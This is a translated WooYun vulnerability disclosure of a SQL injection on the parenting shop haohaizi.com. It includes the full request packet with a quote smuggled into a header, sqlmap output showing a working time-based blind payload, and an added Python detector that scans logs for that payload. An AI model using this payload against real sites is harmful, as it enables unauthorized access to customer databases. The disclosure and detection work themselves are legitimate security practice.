
Vulnerability summary

Defect ID: wooyun-2015-0120509

Title: SQL injection at one location on 好孩子育儿网 (12 databases, involving a large number of tables and content)

Related vendor: 好孩子育儿网

Reported by: 天地不仁 以万物为刍狗

Submitted: 2015-06-14 23:40

Fixed: 2015-07-30 17:22

Published: 2015-07-30 17:22

Vulnerability type: SQL injection

Severity: High

Self-assessed Rank: 20

Status: confirmed by the vendor

Source: http://www.wooyun.org; for questions or help, contact [email protected]



Vulnerability details

Disclosure status:

2015-06-14: Details sent to the vendor, awaiting vendor handling
2015-06-15: Vendor confirmed; details disclosed to the vendor only
2015-06-25: Details disclosed to core white hats and domain experts
2015-07-05: Details disclosed to regular white hats
2015-07-15: Details disclosed to intern white hats
2015-07-30: Details disclosed to the public

Brief description:

Heaven and earth are not benevolent; they treat all things as straw dogs (too many tables are involved and the dump ran slowly, so I did not run it).

Detailed description:

Request packet:

GET /article-help-getvisitororder.html?t=1434284989451&mode=3&strfield=13800138000 HTTP/1.1
Host: www.haohaizi.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:33.0) Gecko/20100101 Firefox/33.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Referer: http://www.haohaizi.com/article-help-visitororders.html
Cookie: origins=%5B%7B%22utm_source%22%3A%22linktech%22%2C%22utm_medium%22%3A%22cps%22%2C%22utm_term%22%3Anull%2C%22utm_content%22%3Anull%2C%22utm_campaign%22%3Anull%2C%22create_time%22%3A1434284937%2C%22expired_time%22%3A1435494537%2C%22other%22%3A%7B%22adid%22%3A%22shichangcps%22%2C%22cid%22%3A%221636%22%2C%22fbt%22%3A%22A100202883%7C2390474880000E%5E20150614202714-80627%7C99999%7C01%7C%22%7D%7D%5D; vary=77b9f63c97b5ce99c6d26b76c12e347726a340f2657fb48326076630b12a0082; _jzqa=1.897618466894645600.1434284871.1434284871.1434284871.1; _jzqb=1.3.10.1434284871.1; _jzqc=1; _jzqx=1.1434284871.1434284871.1.jzqsr=click%2Elinktech%2Ecn|jzqct=/.-; _jzqckmp=1; __utma=101467934.1657353480.1434284871.1434284871.1434284871.1; __utmb=101467934.2.10.1434284871; __utmc=101467934; __utmz=101467934.1434284871.1.1.utmcsr=linktech|utmccn=(not%20set)|utmcmd=cps; __utmv=101467934.|3=ADID=shichangcps=1; Hm_lvt_53a0d71dba66835ff1aa907db99144d8=1434284872; Hm_lpvt_53a0d71dba66835ff1aa907db99144d8=1434284893; Hm_lvt_4c7ef74c5005ae3d162bbb46e1a5a502=1434284875; Hm_lpvt_4c7ef74c5005ae3d162bbb46e1a5a502=1434284892; s=43d77f2b115789066d4882150043031e; S[CART_COUNT]=0; S[CART_NUMBER]=0; S[CART_TOTAL_PRICE]=%EF%BF%A50.00; isVisitor=1; user1=10000000; _qzja=1.1084372355.1434284871142.1434284871142.1434284871143.1434284871143.1434284891118..0.0.2.1; _qzjb=1.1434284871142.2.0.0.0; _qzjc=1; _qzjto=2.1.0; MEMBER=-d41d8cd98f00b204e9800998ecf8427e-d41d8cd98f00b204e9800998ecf8427e-1434284965; loginName=%E6%B8%B8%E5%AE%A2%E8%B4%AD%E7%89%A9%E4%B8%93%E7%94%A8; UNAME=%E6%B8%B8%E5%AE%A2%E8%B4%AD%E7%89%A9%E4%B8%93%E7%94%A8; MLV=1; S[MEMBER]=10000000
X-Forwarded-For: 8.8.8.8'
Connection: keep-alive


The strfield parameter is injectable (I tested with my own phone number earlier and did not change it, so it is masked below; see the screenshots and the proof section for the exact parameter).

[Screenshot: 0.png]

12 databases in total

[Screenshots: 1.png, 2.png, 3.png, 4.png]

Proof of vulnerability:

GET parameter 'strfield' is vulnerable. Do you want to keep testing the others (if any)? [y/N] n
sqlmap identified the following injection points with a total of 108 HTTP(s) requests:
---
Parameter: strfield (GET)
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
Payload: t=1434284989451&mode=3&strfield=13800138000' AND (SELECT * FROM (SELECT(SLEEP(5)))zLJp) AND 'Qxdq'='Qxdq
---
[20:42:48] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL 5.0.12
[20:42:48] [INFO] fetching database names
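As an added example (not part of the original report or the vendor's code): a small detector a defender could run over web-server access logs to flag requests to this endpoint whose strfield value carries the quote-break and SLEEP() shape of the time-based blind payload shown above. The log lines and the common-log-format layout are constructed assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Markers of the injection shape shown in the proof: a quote that closes the
# string literal followed by AND/OR, and the MySQL delay functions used by
# time-based blind injection.
SQLI_PATTERNS = [
    re.compile(r"'\s*(and|or)\b", re.I),            # 13800138000' AND ...
    re.compile(r"\b(sleep|benchmark)\s*\(", re.I),  # SLEEP(5)
]

# Common log format prefix (assumed): ip - - [time] "METHOD path HTTP/x" status
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3})')

def suspicious_params(path, watched=("strfield",)):
    """Return (param, decoded value) pairs whose value matches an injection marker."""
    params = parse_qs(urlsplit(path).query, keep_blank_values=True)
    hits = []
    for name in watched:
        for value in params.get(name, []):   # parse_qs already URL-decodes
            if any(p.search(value) for p in SQLI_PATTERNS):
                hits.append((name, value))
    return hits

def scan_log(lines):
    """Return (ip, timestamp, param, value) alerts for lines with a suspicious parameter."""
    alerts = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # skip lines that are not in the expected format
        ip, ts, _method, path, _status = m.groups()
        for name, value in suspicious_params(path):
            alerts.append((ip, ts, name, value))
    return alerts

# Constructed sample log lines (not from the report). The second one carries the
# URL-encoded form of the time-based blind payload quoted in the proof above.
SAMPLE_LOG = [
    '203.0.113.5 - - [14/Jun/2015:20:42:40 +0800] "GET /article-help-getvisitororder.html?t=1434284989451&mode=3&strfield=13800138000 HTTP/1.1" 200 512',
    '203.0.113.5 - - [14/Jun/2015:20:42:48 +0800] "GET /article-help-getvisitororder.html?t=1434284989451&mode=3&strfield=13800138000%27%20AND%20%28SELECT%20%2A%20FROM%20%28SELECT%28SLEEP%285%29%29%29zLJp%29%20AND%20%27Qxdq%27%3D%27Qxdq HTTP/1.1" 200 512',
    '198.51.100.7 - - [14/Jun/2015:20:43:01 +0800] "GET /article-help-visitororders.html HTTP/1.1" 200 2048',
]

if __name__ == "__main__":
    for ip, ts, name, value in scan_log(SAMPLE_LOG):
        print(f"{ts} {ip} suspicious {name}={value!r}")
```

Pattern matching of this kind only catches the default payload shape a tool emits; the durable fix is to pass strfield to the database through a parameterized query rather than string concatenation.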

Fix recommendation:

Copyright notice: please credit the source when reposting: 天地不仁 以万物为刍狗@乌云


Vulnerability response

Vendor response:

Severity: High

Vulnerability Rank: 10

Confirmed at: 2015-06-15 17:20

Vendor reply:

Thank you for your attention to 好孩子; we will fix the vulnerability as soon as possible.

Latest status:

None yet